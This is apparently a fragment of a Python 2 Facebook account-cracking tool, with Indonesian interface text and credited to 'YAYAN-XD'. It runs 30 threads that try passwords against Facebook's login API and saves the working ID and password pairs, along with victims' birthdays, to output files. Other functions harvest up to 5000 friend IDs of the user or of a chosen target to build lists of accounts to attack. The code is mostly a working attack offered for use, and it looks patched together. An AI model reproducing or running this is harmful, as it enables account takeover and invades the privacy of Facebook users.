				send=ses.get(api,params=param, headers=headers_)
				if "access_token" in send.text and "EAAA" in send.text:
					print '\r\033[1;97m 👉 \033[1;97m[\033[1;96mOK\033[1;97m]\033[1;96m\033[1;96m ' +uid+ ' \033[1;97m◊\033[1;92m ' + asu + '        '
					ok.append(uid+' • '+asu)
					save = open('out/OK-%s-%s-%s.txt' % (ha, op, ta),'a') 
					save.write('\r\033[1;97m 👉 \033[1;97m[\033[1;96mOK\033[1;97m]\033[1;96m\033[1;96m '+str(uid)+' \033[1;97m◊\033[1;96m '+str(asu)+'\n')
					save.close()
					break
					continue
					continue
				elif "www.facebook.com" in send.json()["error_msg"]:
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						nama = data['name']
						ttl = data['birthday'].replace("/","-")
						print('\r\033[1;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m ' +uid+ ' \033[1;96m◊\033[1;97m ' + asu + ' \033[1;96m◊\033[1;97m ' + ttl)
						cp.append(uid+'|'+asu+'|'+ttl)
						save = open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
						save.write('\033[1;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m◊\033[1;97m '+str(pw)+'\n')
						open("CP/%s.txt"%(tanggal),"a").write("%s|%s|%s\n"%(uid, asu, ttl))
						save.close()
						break
					except(KeyError, IOError):
						ttl = ' '
					except:pass
					print '\r\033[1;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m ' +uid+ ' \033[1;96m◊\033[1;97m ' + asu + '        '
					cp.append(uid+'|'+asu)
					save = open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
					save.write('\033[1;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m◊\033[1;97m '+str(pw)+'\n')
					open("CP/%s.txt"%(tanggal),"a").write(" %s|%s\n"%(uid, asu))
					save.close()
					break
					continue
			
			loop += 1
		except:
			pass
	p = ThreadPool(30)
	p.map(main, id)
	print("\n crack selesai...")
	print
	print
	exit()

def buat_folder():
	try:os.mkdir("CP")
	except:pass
	try:os.mkdir("OK")
	except:pass

def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

back = 0
threads = []
id = []
idteman = []
idfromteman = []
	
def id_teman1():
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print ' Token invalid'
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        masuk()

    try:
        os.mkdir('out')
    except OSError:
        pass

    try:
        os.system('clear')
        print
	print
        r = requests.get('https://graph.facebook.com/me?fields=name,friends.fields(id,name).limit(5000)&access_token=' + toket)
        z = json.loads(r.text)
        print('\033[1;96m[\033[1;97m!\033[1;96m] \033[1;97mMENGAMBIL SEMUA \033[1;96mID \033[1;97mTEMAN')
	print('\033[1;97mjika ingin berhenti mengambil ID tekan \033[1;95mctrl \033[1;97m+\033[1;95m z')
	jalan("\033[1;96m¤"*48)
        print
        bz = open('out/id_teman.txt', 'w')
        for a in z['friends']['data']:
            idteman.append(a['id'])
            bz.write(a['id'] + '\n')
            print '\r\x1b[1;96m [\x1b[1;97m•\x1b[1;96m] \x1b[1;97m' + str(len(idteman)) + '  \033[1;96m◊\033[1;97m ',
            sys.stdout.flush()
            time.sleep(0.005)
            print '\x1b[1;97m' + a['id']

        bz.close()
        print '\n\x1b[1;97m [\x1b[1;96m\xe2\x9c\x93\x1b[1;97m] \33[3;1m\x1b[1;96msukses mengambil ID\33[0;1m '
        print '\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33[3;1m\x1b[1;96mtotal ID\x1b[1;97m :\x1b[1;93m %s' % len(idteman)
        done = raw_input('\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33[3;1m\x1b[1;96msimpan nama file\x1b[1;97m : \x1b[1;93m')
        os.rename('out/id_teman.txt', 'out/' + done)
        print '\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33[3;1m\x1b[1;96mfile tersimpan \x1b[1;97m: \x1b[1;93mout/' + done
	print
        exit()
    except IOError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mgagal membuat file'
	print
        exit()
    except (KeyboardInterrupt, EOFError):
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mterhenti ! '
	print
        exit()
    except KeyError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mgagal '
	print
        exit()
    except OSError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mfile anda tidak tersimpan !'
	print
        exit()
    except requests.exceptions.ConnectionError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mTidak ada koneksi !'
	print
        exit()
	
def idfrom_teman1():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print ' Token Invalid'
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        masuk()

    try:
        os.mkdir('out')
    except OSError:
        pass

    try:
        os.system('clear')
        print
	print
        idt = raw_input('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;97mUser ID Target : \033[1;93m')
        try:
            jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
            op = json.loads(jok.text)
            print '\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;97mNama Akun      : \x1b[1;93m' + op['name']
        except KeyError:
            print ' \x1b[1;91mID Publik Tidak Ada !'
            raw_input('\n\x1b[1;93m[\x1b[1;91mKembali\x1b[1;93m]')
            dump()

        r = requests.get('https://graph.facebook.com/'+idt+'?fields=name,friends.fields(id,name).limit(5000)&access_token=' + toket)
        z = json.loads(r.text)
        print('\033[1;96m[\033[1;97m!\033[1;96m] \033[1;97mMENGAMBIL SEMUA \033[1;96mID \033[1;97mTEMAN')
	print('\033[1;97mjika ingin berhenti mengambil ID tekan \033[1;95mctrl \033[1;97m+\033[1;95m z')
	jalan("\033[1;96m¤"*48)
        print
        bz = open('out/id_teman_from_teman.txt', 'w')
        for a in z['friends']['data']:
            idfromteman.append(a['id'])
            bz.write(a['id'] + '\n')
            print '\r\x1b[1;96m [\x1b[1;97m•\x1b[1;96m] \x1b[1;97m' + str(len(idfromteman)) + '  \033[1;96m◊\033[1;97m ',
            sys.stdout.flush()
            time.sleep(0.005)
            print '\x1b[1;97m' + a['id']

        bz.close()
        print '\n\x1b[1;97m [\x1b[1;96m\xe2\x9c\x93\x1b[1;97m] \33[3;1m\x1b[1;96msukses mengambil ID\33[0;1m '
        print '\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33[3;1m\x1b[1;96mtotal ID\x1b[1;97m :\x1b[1;93m %s' % len(idfromteman)
        done = raw_input('\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33[3;1m\x1b[1;96msimpan nama file\x1b[1;97m : \x1b[1;93m')
        os.rename('out/id_teman_from_teman.txt', 'out/' + done)
        print '\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33[3;1m\x1b[1;96mfile tersimpan \x1b[1;97m: \x1b[1;93mout/' + done
	print
        exit()
    except IOError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mgagal membuat file'
	print
        exit()
    except (KeyboardInterrupt, EOFError):
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mterhenti ! '
	print
        exit()
    except KeyError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mgagal '
	print
        exit()
    except OSError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mfile anda tidak tersimpan !'
	print
        exit()
    except requests.exceptions.ConnectionError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;96mTidak ada koneksi !'
	print
        exit()


def tik():
    titik = [
     '.   ', '..  ', '... ']
    for o in titik:
        print '\r\x1b[1;96m [\033[1;97m*\033[1;96m]\033[1;97m Memeriksa Lisensi ' + o,
        sys.stdout.flush()
        time.sleep(1)
     
HUT = '\x1b[1;34m'
H = '\x1b[1;37m'

def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.001)
		
def logo():
	time.sleep (0.01)
	print
	print
 	jalan ('\033[1;37m                    ______---_____ ')
  	jalan ('\033[1;37m         ___-----           __      ----_ ')
	jalan ('\033[1;37m ___---             ___------             \ ')
	jalan ('\033[1;37m     ---______        ----                 \ ')
	jalan ('\033[1;37m                 --__    |             _____) ')
	jalan ('\033[1;37m                     -                /     \ ')
	jalan ('\033[1;37m          _____-----    ___--         \    /)\ ')
	jalan ('\033[1;37m    -----_____      ---____            \__/  / ')
	jalan ('\033[1;37m                 --__    \ --    _          /\ ')
	jalan ('\033[1;37m                      --__-__     \_____/   \_/\ ')
	jalan ('\033[1;37m                            ----|   /          | ')
	jalan ('\033[1;31mAuthor \033[1;37m : YAYAN-XD              |  |___________| ')
	jalan ('\033[1;32mAdmin  \033[1;37m : JESSICA PUTRI         |  | ((_(_)| )_) ')
	jalan ('\033[1;33mGroup\033[1;37m   : \033[1;37mRATU ERROR            \33[0;1m\033[1;37m|  \_((_(_)|/(_) ')
	jalan ('\033[1;36m¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\033[1;37m\             ( ')
	jalan ('\033[1;36m¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\033[1;37m\_____________)')
	print

#------->login token jangan lupa masukin token facebook jangan token listrik kontol<-------#     
			
if __name__ == '__main__':
#	buat_folder()
#	xxnx()
	pilihlogin()
